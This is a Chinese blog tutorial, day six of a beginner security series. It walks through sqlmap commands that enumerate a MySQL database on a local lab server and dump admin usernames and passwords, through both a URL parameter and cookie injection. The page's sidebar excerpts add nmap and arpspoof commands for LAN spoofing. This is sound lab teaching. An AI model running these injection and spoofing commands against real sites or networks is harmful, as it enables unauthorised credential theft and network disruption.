从零开始学安全--第6天

最新推荐文章于 2022-06-12 15:18:44 发布
最新推荐文章于 2022-06-12 15:18:44 发布
阅读量113 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_veget_dog/article/details/115265972
版权

sqlmap cookie注入使用

之前了解了sqlmap的基本使用,注入的是一个Access的数据库(数据库名只能爆破猜解),今天我们在来练习一下MySql的数据库。

首先还是在win7上使用NPMserv来搭建目标网站,在kali里面使用sqlmap,这里询问探测到数据库可能是MySQL,是否需要继续试试其他的数据库类型,我们选no
在这里插入图片描述

这里提示到我们是级别1和风险1的检测,这里可以了解一下

–level 5: 探测等级 参数–level 5
指需要执行的测试等级,一共有5个等级(1~5),可不加level,默认是1.sqlmap使用的Payload可以在xml/payload.xml中 看到,也可以根据相应的格式添加自己的Payload,其中5级包含的Payload最多,会自动破解出cookie、XFF等头注入。当然,level5的运行速度也比较慢 。

这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP
User-Agent/Referer头在level为3时就会测试。总之,在不确定哪个Payload或参数为注入点时,为保证全面性,建议使用高得level值。

原文链接:https://blog.csdn.net/zouchengzhi1021/article/details/104838355
在这里插入图片描述

可以看到是MySQL数据库,info_id是注入点,这里可以时间盲注、boolean盲注、union注入
在这里插入图片描述

和Access不一样,MySQL可以直接爆出数据库名,因为有元数据库information_schema:

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --dbs

在这里插入图片描述

这里我们可以用 下面的current-db来检测出正在使用的数据库,是govcn

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140”
–current-db

在这里插入图片描述
当前使用的用户,是root

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --current-user

在这里插入图片描述

接下来就是查表了

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --tables
-D “govcn”

在这里插入图片描述

接着再查admin表的columns

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --columns
-T “admin” -D “govcn”
在这里插入图片描述

ok最后再查字段username和password

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --dump -C
“username,password” -T “admin” -D “govcn”

在这里插入图片描述
什么是cookie

cookie用于在客户端本地保存用户访问网站时的一些身份验证信息。
比如说上qq邮箱,有个十天内免登录或者免登录选项,这就是利用cookie下次免密码验证来登录。
cookie与get和post方法一样,都可用于客户端向服务器端传递数据。

再用sqlmap感受一下cookie注入,搭建的网站是南方数据5.0,屏蔽掉了get和post的提交,用小旋风搭建,还是一样把文件解压放到AspWebServer目录的wwwroot下.可以看到 post提交的被屏蔽了.

在这里插入图片描述

这里问是否要对cookie进行url编码,我们选择是

sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2

这里使用level 2 是因为sqlmap共有五个等级,默认为1。
级别1,探测GET和POST数据。
级别2,探测Cookie数据。
在这里插入图片描述

这里说cookie 参数的id是可以攻击的,问我们是否要检测其他注入点,选择no
在这里插入图片描述

直接爆一下表名

sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–tables

在这里插入图片描述

直接成功爆出表名,这里user肯定是我们关注的
在这里插入图片描述

我们直接来跑一下字段,这里是用字典来爆破的,可以看到我们需要的字段就可以停止了

sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–columns -T “user”

在这里插入图片描述
在这里插入图片描述

直接跑一下我们需要的数据

sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–dump -C “userid,usename,password” -T “user”

在这里插入图片描述

Little_veget_dog
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
从零开始习CANoe(一)—— 新建工程
蚂蚁小兵
10-23 3万+
从零开始习CANoe (一)—— 新建工程、 这个系列会包含各种CANoe/CAPL的相关知识 包括dbc的设计、panel的设计、trace分析,系统环境变量、CAPL脚本编写等
SQL Server 2012从零开始培训视频和PPT.rar
04-24
第6章认识函数.ppt 第7章Transact-SQL查询.ppt 第8章数据的更新.ppt 第9章规则、默认和完整性约束ppt 第10章创建和使用索引l.ppt 第11章事务和锁.ppt 第12章游标ppt 第13章存储过程和自定义函数。ppt 第14章视图操作...
mysql 多行拼接注入_SQL注入技术专题—由浅入深【精华聚合】
weixin_34471172的博客
02-01 316
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。什么是SQL注入SQL注入基本介绍结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准会对SQL...
从零起-----通识篇06 https
qq_63622741的博客
04-10 4410
一、习目标 了解HTTPS中所涉及到的技术及作用 了解SSL/TLS协议的技术机制及意义 理解加密解密技术在HTTPS中的重要作用 理解证书在HTTPS中的重要作用 二、习背景 HTTPS(全称是Hyper Text Transfer Protocol over SecureSocket Layer)是身披SSL/TLS外壳的HTTP。它在HTTP之上利用SSL/TLS建立安全的信道,加密数据传输。它被广泛用于互联网上安全敏感的通讯,例如电商、支付等应用。 三、习内容 1、加密
从零开始搭建Ubuntu CTF-pwn环境
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
从零开始习 kali-渗透 7月27日
qq_42184699的博客
07-27 9127
端口扫描 nmap -sS 目标ip Arp 内网断网 Arpspoof -i 网卡 -t 目标ip 网关 获取网卡/网关 ifconfig 获取内网ip fping -asg 192.168.1.0/24 Arp 欺骗 echo 写命令,是不会有回显的 ehco 1 >proc/sys/net/ipv4/ip_forward # 进行IP流量转发 目标 --》 我的网卡 --》网关 dr...
从零开始习CTF——CTF是什么
热门推荐
洛柒尘的博客
06-03 5万+
前言: 从2019年10月开始接触CTF,习了sql注入、文件包含等web知识点,但都是只知道知识点却实用不上,后来在刷CTF题才发现知识点的使用方法,知道在哪里使用,哪里容易出漏洞,可是在挖src漏洞中还是很迷漫,了快一年还是没挖过一条src漏洞。这一系列是把自己习的CTF的过程详细写出来,方便大家习时可以参考。 一、CTF简介 简介 中文一般译作夺旗赛(对大部分新手也可以叫签到赛),在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式 CTF起源于1996年DEFCON全球黑客
CentOS7 - 从零开始习 推荐新手入门
serendipity_cat的博客
01-20 9901
CentOS7 习指南一、基础知识Shell查看内部命令命令行格式控制台的辅助操作获得命令帮助的方法二、常用指令①PWD 查看当前的工作目录②CD 切换工作目录相对路径相对路径的表示形式绝对路径③ls 列表显示目录内容④alias 设置别名⑤mkdir 创建新目录 一、基础知识 Shell Linux系统中运行的一种特殊程序 在用户和内核之间之间充当“翻译官” 用户登陆Linux系统时,自动加载一个Shell程序 Bash是Linux系统中默认使用的Shell程序 查看内部命令 help enable
3. Spring Boot 从零开始
menergy
03-22 1573
1. Spring 的生态圈 Spring 官网地址:Spring | Homehttps://spring.io/ 进入官网首页,可以看到Spring能做什么: 1. Microservices: 微服务开发。把大型应用拆分成一个个微小的功能模块,每一个微小的功能模块就是一个微服务。 2. Reactive: 响应式编程。基于异步非阻塞的方式, 整个应用之间构建异步数据流的方式,异步数据流运行占用少量的服务器线程资源(少量的CPU,少量的内存资源),从而构建一个高吞吐量的应用。 3. C
Redis 运维 - 从零开始
serendipity_cat的博客
05-07 3242
Redis 运维 - 从零开始习一、Redis简介Redis 的优点二、Redis 与 Memcached 的区别三、Redis部署1. 下载编译及安装2. 配置环境 一、Redis简介 Redis是一个基于C语言为底层代码开发的开源SQL数据库,Redis基于内存运行并持久化,采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环 Redis 的优点 具有极高的数据读写速度:数据读取的速度最高可达到 110000次/s,数据写入速度最高可达到 81000次/s 支持丰富的数据类型
从零开始习Hadoop--第1章 Hadoop的安装
大数据和机器学习研究
10-29 7879
Hadoop的安装比较繁琐,有如下几个原因:其一,Hadoop有非常多的版本;其二,官方文档不尽详细,有时候更新脱节,Hadoop发展的太快了;其三,网上流传的各种文档,或者是根据某些需求定制,或者加入了不必须要的步骤,或者加入容易令人误解的步骤。其实安装是很重要的步骤,只有安装好了,才能谈及下一步。 在本书撰写的时候,选用Hadoop的stable版安装。 笔者的登录用户名是bria
从零开始习软件漏洞挖掘系列教程第六篇:进击ASLR地址随机化1
08-03
1实验简介实验所属系列: 系统安全实验对象: 本科/专科信息安全专业相关课程及专业: 计算机网络实验时数(分):2 时实验类别: 实践实验类2 实 验目的通
从零开始电路基础
09-03
电路基础习的好资料 第一章 电路与电场基础 第二章 电路基本定律 第三章 电路的等效变换 ...第六章 交流电路 第七章 三相交流电路与安全用电 第八章 互感和变压器 第九章 电路的过渡过程 第十章 Edison 软件应用
数据库基础从零开始全面分析数据库 初者的最佳选择
08-03
第6章_视图、存储过程和自定义函数_V08_2 第7章_关系数据库规范化理论_V08_2 第8章_数据库设计_V08_2 第9章_数据库完整性约束_V08_2 第10章_数据库安全性_V08_2 第11章_数据库的备份与恢复技术_V08_2 第12章_面向...
从零开始电路基础 part1
02-24
从零开始电子技术丛书 国防工业出版社 刘建清主编 注重定性和概念,注重基础知识与实践,并配合计算机仿真软件的仿真实验。 目录 第一章 电路与电场基础知识 第二章 电路基本定律 第三章 电路的等效变换 第四章 ...
python自教程-04-自定义JavaScript.ev4.rar
05-21
python自教程-04-自定义JavaScript.ev4.rar
严蔚敏数据结构全套C语言实现
05-21
严蔚敏数据结构全套C语言实现
Java_Android的可扩展媒体播放器.zip
05-21
Java_Android的可扩展媒体播放器
源代码-DBAdmin 在线Access数据库管理程序 v2.3.zip
最新发布
05-21
源代码-DBAdmin 在线Access数据库管理程序 v2.3.zip
从零开始的U-net入门
04-04
以下是从零开始习U-net的步骤: 1. 了解U-net的基本架构 U-net主要由编码器和解码器两部分组成。编码器部分可以将输入图像转换为低维特征表示,而解码器部分可以将这些特征重构成与原始图像相同大小的分割结果。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值